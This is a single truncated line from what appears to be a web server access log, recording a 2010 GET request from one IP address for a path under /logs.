125.141.91.138 - - [12/Feb/2010:11:55:39 -0800] "GET /logs/access_1001